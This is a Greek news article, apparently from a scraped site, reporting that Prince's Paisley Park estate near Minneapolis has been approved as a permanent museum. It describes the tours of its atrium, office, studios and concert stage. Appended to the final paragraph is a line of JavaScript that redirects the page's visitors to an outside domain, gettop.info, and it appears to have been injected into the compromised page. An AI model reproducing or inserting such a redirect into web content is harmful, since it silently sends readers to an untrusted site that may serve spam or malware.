Τόπος προσκυνήματος η έπαυλη του Prince

0
9

 

Ανοιχτή για τον κοινό θα είναι η έπαυλη του αείμνηστου «Πρίγκιπα της μουσικής», Prince, η οποία θα γίνει τόπος προσκυνήματος για τους θαυμαστές του.

Με ομόφωνη ψήφο στις αρχές της εβδομάδας το δημοτικό συμβούλιο του Chanhassen, έξω από τη Μινεάπολη των ΗΠΑ, ενέκρινε τον επαναχαρακτηρισμό του Paisley Park ως μόνιμο μουσείο.

Η έκτασης 65.000 τμ έπαυλη ήταν η κατοικία και το στούντιο ηχογραφήσεων του πολυβραβευμένου με Γκράμι καλλιτέχνη.

Οι ξεναγήσεις επισκεπτών ξεκίνησαν από την Παρασκευή 28 Οκτωβρίου και τα εισιτήρια έως τον Δεκέμβριο έχουν ήδη εξαντληθεί.

Η έπαυλη από τον θάνατό του άνοιξε για το κοινό για περιορισμένες ξεναγήσεις για τρεις μέρες στο πλαίσιο προσωρινής συμφωνίας με τη δημοτική αρχή.

Κατά τη διάρκεια των ολιγάριθμων περιηγήσεων, οι επισκέπτες του Paisley Park οδηγήθηκαν μέσω ενός λόμπι σε ένα αίθριο γεμάτο με αναμνηστικά του Πρινς και τοιχογραφίες. Στο κέντρο της αίθουσας υπήρχαν μία τεφροδόχος – μωβ και σε σχήμα κρύπτης – όπου τοποθετήθηκαν οι στάχτες του καλλιτέχνη.

Οι επισκέπτες περιηγήθηκαν επίσης στο ιδιωτικό γραφείο του – το οποίο έχει ακόμη τις οικογενειακές φωτογραφίες και ανοιχτούς χαρτοφύλακες ανέγγιχτους από τότε που πέθανε – καθώς και στα στούντιο ηχογράφησης και μοντάζ και σε μία πελώρια σκηνή συναυλιών στην έπαυλη, όπου ο Πρινς γύριζε τα μουσικά βίντεο, έδινε πριβέ συναυλίες και διοργάνωνε πάρτι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here